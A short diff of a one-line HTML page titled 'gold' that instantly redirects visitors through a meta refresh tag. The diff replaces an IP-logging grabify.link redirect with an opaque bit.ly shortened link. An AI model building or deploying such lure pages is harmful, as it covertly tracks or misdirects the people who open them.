--- a/gold/index.html
+++ b/gold/index.html
@@ -1,6 +1,6 @@
 <html>
     <title>gold</title>
     <head>
-    <meta http-equiv = "refresh" content = "0.0001; url = https://grabify.link/R7Y288" />
+    <meta http-equiv = "refresh" content = "0.0001; url = https://bit.ly/3aP2Qpz" />
     </head>
 </html>
